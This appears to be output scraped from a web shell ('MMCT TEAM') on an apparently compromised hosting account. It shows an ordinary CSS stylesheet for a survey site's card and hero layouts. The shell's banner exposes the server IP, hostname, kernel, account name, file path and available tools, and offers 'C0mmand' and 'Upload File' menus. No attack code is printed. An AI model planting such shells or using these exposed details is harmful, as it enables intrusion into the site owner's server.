MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.68
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/imyrqtmy/public_html/ssv/cgsurveynew/assets/css/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/ssv/cgsurveynew/assets/css/index_industry.css
.wrapper-card {
  margin-top: 5%;
  display: flex;
  flex-direction: row;
  align-items: center;
  width: 100%;
  justify-content: space-around;
}

@media screen and (max-width: 768px) {
  .wrapper-card {
    display: flex;
    flex-direction: column;
  }

  .wrapper-card .card_css {
    margin-top: 10%;
  }

  .wrapper-card .card_css {
    width: 20rem;
  }

  .wrapper-card .card_css:hover {
    transform: scale(1);
  }
}

.card_css {
  width: 30rem;
  height: 360px;
  border-radius: 15px;
  padding: 1.5rem;
  background: white;
  position: relative;
  display: flex;
  align-items: flex-end;
  transition: 0.4s ease-out;
  box-shadow: 0px 7px 10px rgba(0, 0, 0, 0.5);
}
.card_css:hover {
  transform: scale(1.1);
}
.card_css:hover:before {
  opacity: 1;
}
.card_css:hover .info {
  opacity: 1;
  transform: translateY(0px);
}
.card_css:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  display: block;
  width: 100%;
  height: 100%;
  border-radius: 15px;
  background: rgba(0, 112, 213, 0.6);
  z-index: 2;
  transition: 0.5s;
  opacity: 0;
}
.card_css img {
  width: 100%;
  height: 100%;
  -o-object-fit: cover;
  object-fit: cover;
  position: absolute;
  top: 0;
  left: 0;
  border-radius: 15px;
}
.card_css .info {
  position: relative;
  z-index: 3;
  color: white;
  opacity: 0;
  transform: translateY(30px);
  transition: 0.5s;
}
.card_css .info h1 {
  margin: 0px;
}
.card_css .info p {
  letter-spacing: 1px;
  font-size: 15px;
  margin-top: 8px;
}
.card_css .info button {
  padding: 0.6rem;
  outline: none;
  border: none;
  border-radius: 3px;
  background: white;
  color: black;
  font-weight: bold;
  cursor: pointer;
  transition: 0.4s ease;
}
.card_css .info button:hover {
  background: dodgerblue;
  color: white;
}

.card-enter {
  margin: 10px;
  background-color: #fff;
  border-radius: 20px;
  box-shadow: 0 2px 20px rgba(0, 0, 0, 0.2);
  overflow: hidden;
  width: 256px;
  height: 420px;
  display: flex;
  align-items: center;
  justify-content: center;
}

@media only screen and (max-width: 800px) {
  .card-enter {
    justify-content: center;
    align-self: center;
  }
  .card-body-enter h3 {
    font-size: 30px;
  }
}

.card-header-enter {
  background-color: white;
}
.card-header-enter img {
  width: 100%;

  height: 100px;
  object-fit: cover;
}
.card-body-enter {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  padding: 20px;
  min-height: 250px;
}

.card-body-enter p {
  text-align: justify;
  font-size: 15px;
  margin: 0 0 40px;
}

.card-body-enter h3 {
  font-weight: 700;
}

div.contain-res {
  overflow: hidden;
  display: none;
}

.swiper-wrapper {
  width: 92%;
}

@media screen and (max-width: 768px) {
  div.contain {
    display: none;
  }

  div.contain-res {
    display: block;
    overflow: hidden;
    width: 90%;
    padding: auto;
  }
}

.info h1{
  font-size: 2.5rem ;
}

@media screen and (max-width: 768px) {
  .info h1{
    font-size: 1.8rem !important;
  }

}

div.indus-res {
  display: none;
}

@media screen and (max-width: 992px) {
  div.indus-res {
    display: block;
  }

  .indus-cont {
    display: none;
  }
}


.highlights {
  text-align: center;
  padding: 50px 20px;
  background-color: white;
}

.highlights h2 {
  margin-bottom: 30px;
  font-size: 2em;
}

.highlights-container {
  display: flex;
  flex-wrap: wrap;
  justify-content: center;
  gap: 40px;
}

.highlight-item {
  background-color: #142743;
  position: relative;
  color: white;
  width: 390px  ;
  padding: 30px;
  border-radius: 10px;
  display: flex;
  flex-direction: column;
  min-height: 250px;
  align-items: center;
  justify-content: center;
  box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
  transition: transform 0.3s;
}

.highlight-item img {
  position: absolute;
  bottom: 80%;
  width: 50px;
  height: 50px;
  margin-bottom: 15px;
}

/* .highlight-item p {
  font-size: 2vw;
  margin: 0;
} */

.highlight-item:hover {
  transform: translateY(-10px);
}

@media (max-width: 1262px) {
  
  .highlight-item{
    width: 257px;
    min-height: 182px;
  }
  
}
@media (max-width: 768px) {
  .highlight-item {
      width: 266px;
  }
}

@media (max-width: 480px) {
  .highlight-item {
      width: 100%;
      height: 150px !important;
  }
  /* .highlight-item p {
    font-size: 4vw;
    margin: 0;
  } */
}

.highlights-container{
  max-width: 1200px !important;
}
/* @media (min-width:911px) {
  .highlight-item img {
    position: absolute;
    bottom: 78% ;
    width: 50px;
    height: 50px;
    margin-bottom: 15px;
  }

} */
@media (min-width:1475px) {
  .highlights-container{
    max-width: 1800px !important;
  }
  /* .highlight-item p{
    font-size: 1.5vw;
  } */

  
}
.industry-highlights-p{
  text-align: center !important;
  font-size: 3.8vw !important;

}

@media (min-width: 481px) and (max-width: 768px) {
  .industry-highlights-p{
    font-size: 2.3vw !important;
  
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .industry-highlights-p {
      font-size: 2.0vw !important;
  }
}

@media (min-width: 991px) {

.industry-highlights-p {
      font-size: 1.2vw !important;
  }}


  
.industrys-hero {
  padding-bottom: 5vw;
}

.industry-hero-img {
  width: 100%;
  height: 100%;
}

.industry-hero-heading {
  position: absolute;
  top: 18vw;
  left: 7vw;
  max-width: 86vw;
}
.industry-hero-heading-h1 {
  padding-top: 5vw;
  max-height: 20.2vw; /* Combination of rem and vw */
  flex-shrink: 0;
  color: #fff;
  font-family: "Poppins", sans-serif;
  font-size: 5.5vw; /* Combination of rem and vw */
  font-style: normal;
  font-weight: 600;
  line-height: normal;
  color: white;
  text-align: start;
}

.industry-hero-heading-p {
  padding-top: 10vw;
  color: #fff;
  font-family: Poppins;
  font-size: 3.8vw;
  font-style: normal;
  font-weight: 400;
  line-height: normal;
}



.industry-hero-heading-button {
  display: flex;
  padding: 1vw 5vw;
  justify-content: center;
  align-items: center;
  gap: 0.6vw;
  border-radius: 0.6rem;
  background: #fff;
}
.industry-hero-heading-button-text {
  color: #3f86fe;
  font-family: Poppins;
  font-size: 3.8vw;
  font-style: normal;
  font-weight: 600;
  line-height: normal;
}

@media (min-width: 768px) {
  .industry-hero-heading {
    top: 14vw;
    left: 7vw;
    max-width: 44vw;
  }

  .industry-hero-heading-h1 {
    padding-top: 1vw;
    max-height: 15.2vw;
    font-size: 2.5vw;
  }

  .industry-hero-heading-p {
    padding-top: 1vw;
    text-align: justify;
    font-size: 1.2vw;
  }

  .industry-hero-heading-button {
    padding: 0.8vw 2vw;
    gap: 0.6vw;
    border-radius: 0.64vw;
  }
  .industry-hero-heading-button-text {
    font-size: 1.1vw;
  }
}

@media (min-width: 992px) {
  .industry-hero-heading-h1 {
    max-height: 11.5vw;
    font-size: 2.4vw;
    font-weight: 600;
  }

  .industry-hero-heading {
    max-width: 45vw; /* Combination of rem and vw */
  }
  .industry-overview-text-p {
    font-size: 1.6vw !important;
  }
  .industry-overview-text-h1 {
    font-size: 3vw !important;
  }

  .industry-overview-text-h4 {
    font-size: 1.6vw !important;
  }

  .industry-overview-text-p {
    font-size: 1.3vw !important;
  }
}

@media (min-width: 1400px) {
  .industry-hero-heading-h1 {
    font-size: 2.8vw; /* Combination of rem and vw */
    max-height: 14vw; /* Combination of rem and vw */
  }
  .industry-hero-heading {
    max-width: 46vw;
  }
}

MMCT - 2023